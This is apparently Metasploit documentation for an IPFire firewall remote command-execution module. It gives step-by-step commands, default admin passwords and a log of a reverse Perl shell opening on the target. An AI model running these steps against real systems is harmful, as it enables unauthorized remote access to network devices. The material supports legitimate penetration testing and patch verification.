## Vulnerable Application

Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)

This module has been verified against:

1. 2.19 core 100
2. 2.19 core 110 (exploit-db, not metasploit module)

## Verification Steps

1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
4. Do: ```set password admin``` or whatever it was set to at install
5. Do: ```set rhost 10.10.10.10```
6. Do: ```set payload cmd/unix/reverse_perl```
7. Do: ```set lhost 192.168.2.229```
8. Do: ```exploit```
9. You should get a shell.

## Options

**PASSWORD**

Password is set at install. May be blank, 'admin', or 'ipfire'.

## Scenarios

```
msf > use exploit/linux/http/ipfire_oinkcode_exec
msf exploit(ipfire_oinkcode_exec) > set password admin
password => admin
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_oinkcode_exec) > set verbose true
verbose => true
msf exploit(ipfire_oinkcode_exec) > check
[*] 192.168.2.201:444 The target appears to be vulnerable.
msf exploit(ipfire_oinkcode_exec) > exploit

[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
```